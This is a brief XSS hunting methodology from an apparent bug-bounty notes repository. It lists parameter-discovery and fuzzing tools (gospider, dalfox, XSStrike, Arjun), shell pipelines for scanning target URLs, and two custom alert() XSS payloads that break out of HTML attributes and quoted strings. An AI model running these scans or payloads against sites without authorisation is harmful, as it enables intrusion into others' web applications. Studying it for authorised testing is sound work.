My-Methodologies/xss
2023-08-28 17:16:44 +00:00
..
README.md GITBOOK-84: change request with no subject merged in GitBook 2023-08-28 17:16:44 +00:00

xss

Get Parameter as much as possible

  1. https://github.com/devanshbatham/ParamSpider
  2. gospider -S tageturls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "=" | qsreplace -a | dalfox pipe -o result.txt
  3. Waybackurls | gau
  4. https://github.com/s0md3v/Arjun
  5. https://github.com/hakluke/hakrawler
  6. https://github.com/PortSwigger/param-miner

Combine all in a file and remove duplicates.

Run XSS fuzzer

  1. https://github.com/s0md3v/XSStrike
  2. https://github.com/hahwul/dalfox

Resources:


dalfox usage:

gf xss domain.txt | grep -Eo 'https?://[^\"]+' > domain.txt
dalfox file domain.txt -w 20 --silence

another technique to find XSS

  • Scrape all urls from the domain using gau
  • then sort the result using grep command: cat url.txt | grep “utm_”
  • do testing

resources:


Custom useful XSS Attack Vectors

testing"><img/src=x onerror=alert(/XSS/)//
testing'-alert(2)-'xss

Encoding Bypass:

https://d3adend.org/xss/ghettoBypass